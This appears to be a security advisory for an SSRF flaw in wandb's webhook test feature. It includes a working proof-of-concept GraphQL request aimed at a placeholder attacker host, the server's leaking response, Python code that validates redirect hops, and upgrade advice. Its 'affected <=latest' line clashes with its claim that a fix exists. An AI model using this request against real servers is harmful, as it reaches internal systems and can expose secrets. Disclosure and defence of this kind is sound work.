Vulnerability description:
Because HTTP 302 redirects are handled incorrectly, the wandb/wandb repository contains a Server-Side Request Forgery (SSRF) vulnerability. It allows a team member with access to the 'User settings -> Webhooks' function to reach internal HTTP(S) servers; in severe cases, for example on AWS instances, this could be abused to achieve remote code execution on the victim's machine. The vulnerability exists in the latest version of the repository.
POST /graphql HTTP/1.1
Host: ip:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:8080/settings
content-type: application/json
X-Origin: http://ip:8080
Content-Length: 572
Origin: http://ip:8080
Connection: close
{"operationName":"TestGenericWebhookIntegration","variables":{"entityName":"test","urlEndpoint":"http://{your-IP}:4444","requestPayload":"{\n\n\n\n\n}"},"query":"mutation TestGenericWebhookIntegration($entityName: String!, $urlEndpoint: String!, $accessTokenRef: String, $secretRef: String, $requestPayload: JSONString) {\n testGenericWebhookIntegration(\n input: {entityName: $entityName, urlEndpoint: $urlEndpoint, accessTokenRef: $accessTokenRef, secretRef: $secretRef, requestPayload: $requestPayload}\n ) {\n ok\n response\n __typename\n }\n}\n"}
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Mar 2024 14:48:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 201
Connection: close
Vary: Origin
X-Content-Type-Options: nosniff
X-Ratelimit-Limit: 1000
X-Ratelimit-Remaining: 1000
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0
{"data":{"testGenericWebhookIntegration":{"ok":true,"response":"{\"response\":\"\\u003ch1\\u003eSSRF secret\\u003c/h1\\u003e\\n\",\"error\":\"\"}","__typename":"TestGenericWebhookIntegrationPayload"}}}
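The weakness described above is a webhook tester that follows an HTTP 302 to wherever it points, so a public URL can bounce the server into an internal address. The following Python is an added example (not wandb's code) of how such a test endpoint can validate every hop of a redirect chain against internal address ranges; the blocked-range list, the `fetch` callable and the injectable resolver are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Hypothetical hardening for a webhook "test" feature (not wandb's code):
# redirects are never followed blindly; each hop is re-validated first.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]


def is_allowed_url(url, resolver=socket.getaddrinfo):
    """True only for http(s) URLs whose host resolves solely to public addresses."""
    p = urlparse(url)
    if p.scheme not in ("http", "https") or not p.hostname:
        return False
    try:
        infos = resolver(p.hostname, p.port)
    except OSError:
        return False
    # sockaddr[0] is the address; strip any IPv6 scope id ("fe80::1%eth0").
    addrs = {ipaddress.ip_address(i[4][0].split("%")[0]) for i in infos}
    if not addrs:
        return False
    return all(not any(a in net for net in BLOCKED_NETS) for a in addrs)


def fetch_webhook(url, fetch, resolver=socket.getaddrinfo, max_hops=3):
    """Follow redirects manually, validating every hop.

    `fetch(url)` must return (status, headers, body) WITHOUT following
    redirects itself. Returns (status, body), or None if any hop is blocked
    or the hop limit is exceeded. Caveat: to also defeat DNS rebinding,
    connect to the address checked here rather than re-resolving the name.
    """
    for _ in range(max_hops + 1):
        if not is_allowed_url(url, resolver):
            return None
        status, headers, body = fetch(url)
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            url = headers["Location"]  # re-validated at the top of the loop
            continue
        return status, body
    return None
```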
Affected products:
wandb/wandb<=latest
Fix / remediation:
The vendor has released an updated version; affected users are advised to upgrade to the latest version.